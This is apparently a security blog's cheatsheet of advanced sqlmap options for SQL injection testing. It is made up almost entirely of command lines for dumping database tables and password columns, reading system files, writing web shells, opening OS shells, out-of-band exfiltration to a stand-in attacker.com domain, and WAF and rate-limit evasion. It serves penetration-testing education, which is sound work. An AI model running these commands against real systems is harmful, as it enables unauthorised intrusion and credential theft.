← Back to writing
Tools & Cheatsheets

SQLMap Advanced Usage

Mar 05, 2025
4 min read
lawbyte

SQLMap automates SQL injection detection and exploitation. Knowing its options deeply separates a quick scan from a thorough assessment.

Basic Syntax

sqlmap -u "https://target.com/page?id=1"

# POST request
sqlmap -u "https://target.com/login" --data="user=admin&pass=test"

# From Burp request file
sqlmap -r request.txt

# Cookie injection
sqlmap -u "https://target.com/page" --cookie="session=abc123; id=1*"
# (*) marks injection point manually

# Header injection
sqlmap -u "https://target.com/page" -H "User-Agent: *"
sqlmap -u "https://target.com/page" -H "X-Forwarded-For: 127.0.0.1*"

Detection & Tuning

# Level (1-5): depth of tests. Default: 1
# Risk (1-3): risk of damaging the target. Default: 1
sqlmap -u "https://target.com/?id=1" --level=5 --risk=3

# Specify parameter to test
sqlmap -u "https://target.com/?id=1&cat=2" -p id
sqlmap -u "https://target.com/?id=1&cat=2" -p "id,cat"

# Specify DBMS (skip fingerprinting)
sqlmap -u "URL" --dbms=mysql
sqlmap -u "URL" --dbms=mssql
sqlmap -u "URL" --dbms=oracle
sqlmap -u "URL" --dbms=postgresql
sqlmap -u "URL" --dbms=sqlite

# Technique specification
sqlmap -u "URL" --technique=BEUSTQ
# B=Boolean-based blind, E=Error-based, U=UNION, S=Stacked, T=Time-based, Q=Inline

# Force UNION columns
sqlmap -u "URL" --union-cols=5
sqlmap -u "URL" --union-char="NULL"

# Prefix/suffix for injection
sqlmap -u "URL" --prefix="'" --suffix="-- -"

Enumeration

# Banner / version
sqlmap -u "URL" --banner

# Current database
sqlmap -u "URL" --current-db

# Current user
sqlmap -u "URL" --current-user

# Is DBA
sqlmap -u "URL" --is-dba

# All databases
sqlmap -u "URL" --dbs

# Tables in a database
sqlmap -u "URL" -D target_db --tables

# Columns in a table
sqlmap -u "URL" -D target_db -T users --columns

# Dump a table
sqlmap -u "URL" -D target_db -T users --dump

# Dump specific columns
sqlmap -u "URL" -D target_db -T users -C "username,password" --dump

# Dump all databases
sqlmap -u "URL" --dump-all

# Search for column name across all DBs
sqlmap -u "URL" --search -C password
sqlmap -u "URL" --search -T users

# Count rows before dumping
sqlmap -u "URL" -D db -T users --count

Authentication

# HTTP Basic Auth
sqlmap -u "URL" --auth-type=Basic --auth-cred="user:pass"

# HTTP Digest
sqlmap -u "URL" --auth-type=Digest --auth-cred="user:pass"

# Cookie-based session
sqlmap -u "URL" --cookie="PHPSESSID=abc123; token=xyz"

# Set headers (e.g., JWT)
sqlmap -u "URL" -H "Authorization: Bearer JWT_TOKEN"

# Form-based login (login before testing)
sqlmap -u "URL" --data="user=admin&pass=test" \
  --cookie="session=abc123"

# Fresh session via login form
sqlmap -u "https://target.com/login" \
  --data="username=admin&password=admin" \
  -H "Referer: https://target.com/login" \
  --second-url="https://target.com/profile?id=1"

Tamper Scripts (WAF Bypass)

# List tamper scripts
sqlmap --list-tampers

# Common tampers
sqlmap -u "URL" --tamper=space2comment
# Replaces spaces with /* */ comments

sqlmap -u "URL" --tamper=between
# Replaces > with NOT BETWEEN 0 AND X

sqlmap -u "URL" --tamper=randomcase
# Randomizes case of keywords: SeLeCt

sqlmap -u "URL" --tamper=charencode
# URL-encodes all characters

sqlmap -u "URL" --tamper=charunicodeescape
# Unicode escapes (')

sqlmap -u "URL" --tamper=equaltolike
# Replaces = with LIKE

sqlmap -u "URL" --tamper=base64encode
# Base64 encodes payload

sqlmap -u "URL" --tamper=hex2char
# Replaces hex strings with chr() equivalents

# Combine multiple tampers
sqlmap -u "URL" --tamper=space2comment,randomcase,charencode

# MySQL WAF bypass combo
sqlmap -u "URL" --tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,ifnull2ifisnull,space2comment

# MSSQL WAF bypass combo
sqlmap -u "URL" --tamper=between,charencode,randomcase,space2comment

OS Interaction

Requires DBA privileges:

# File read
sqlmap -u "URL" --file-read="/etc/passwd"
sqlmap -u "URL" --file-read="C:/Windows/win.ini"

# File write (web shell)
sqlmap -u "URL" --file-write=shell.php --file-dest="/var/www/html/shell.php"
sqlmap -u "URL" --file-write=cmd.aspx --file-dest="C:/inetpub/wwwroot/cmd.aspx"

# OS command execution
sqlmap -u "URL" --os-cmd="whoami"
sqlmap -u "URL" --os-shell   # interactive shell

# OOB (out-of-band) shell via DNS
sqlmap -u "URL" --dns-domain=attacker.com

# Meterpreter payload via sqlmap
sqlmap -u "URL" --os-pwn    # via Metasploit
sqlmap -u "URL" --msf-path=/usr/bin/

Proxies & Logging

# Route through Burp
sqlmap -u "URL" --proxy="http://127.0.0.1:8080"

# TOR
sqlmap -u "URL" --tor --tor-type=SOCKS5 --check-tor

# Randomize user agent
sqlmap -u "URL" --random-agent

# Custom user agent
sqlmap -u "URL" --user-agent="Mozilla/5.0 ..."

# Output directory
sqlmap -u "URL" --output-dir=/tmp/sqlmap_out

# Traffic log
sqlmap -u "URL" --traffic-file=traffic.log

# Verbose output
sqlmap -u "URL" -v 3    # show GET/POST, payloads injected
sqlmap -u "URL" -v 6    # max verbosity — full HTTP

# Batch mode (answer yes to all prompts)
sqlmap -u "URL" --batch

# Results as CSV
sqlmap -u "URL" -D db -T users --dump --csv

Burp Request Integration

# Save request from Burp (right-click → Copy to file, or Burp Logger++)
# Modify the parameter to test with *

cat request.txt
POST /login HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

username=admin*&password=test

sqlmap -r request.txt -p username --level=3 --risk=2 --batch --dbs

Blind SQLi Tuning

# Time-based only
sqlmap -u "URL" --technique=T --time-sec=5

# Increase delay tolerance
sqlmap -u "URL" --technique=T --time-sec=10

# Adjust for slow connections
sqlmap -u "URL" --timeout=30 --retries=5

# Boolean-based blind with binary search
sqlmap -u "URL" --technique=B

# No heavy techniques (safer)
sqlmap -u "URL" --technique=BE --level=2 --risk=1

# Chunked dumps (for large tables)
sqlmap -u "URL" -D db -T users --dump --start=1 --stop=100

Second-Order SQLi

# First request stores payload, second request triggers it
sqlmap -u "https://target.com/register" \
  --data="username=admin&email=test@test.com" \
  --second-url="https://target.com/profile/admin"

# Or specify second request file
sqlmap -r register_request.txt --second-req=profile_request.txt

WAF Detection & Evasion

# Identify WAF
sqlmap -u "URL" --identify-waf

# Slow down to evade rate limiting
sqlmap -u "URL" --delay=2            # 2 seconds between requests
sqlmap -u "URL" --safe-freq=3        # every 3 requests, go to safe URL
sqlmap -u "URL" --safe-url="https://target.com/"

# Chunked encoding bypass
sqlmap -u "URL" -H "Transfer-Encoding: chunked"

# HTTP pipelining
sqlmap -u "URL" --keep-alive

# Custom invalid request to detect WAF behavior
sqlmap -u "URL" --check-waf

# Combined evasion
sqlmap -u "URL" \
  --random-agent \
  --delay=1 \
  --tamper=space2comment,randomcase \
  --level=3 --risk=2 \
  --batch
#exploitation #web #sqlmap #sql-injection
Author lawbyte
Link https://lbyte.id/2025/03/05/tools/web/sqlmap-advanced/
License CC BY-NC-SA 4.0
← Previous Wireshark & tcpdump Cheatsheet Next → Hashcat & John the Ripper Cheatsheet

Discussion

Leave a comment · All fields required · No spam

No comments yet. Be the first.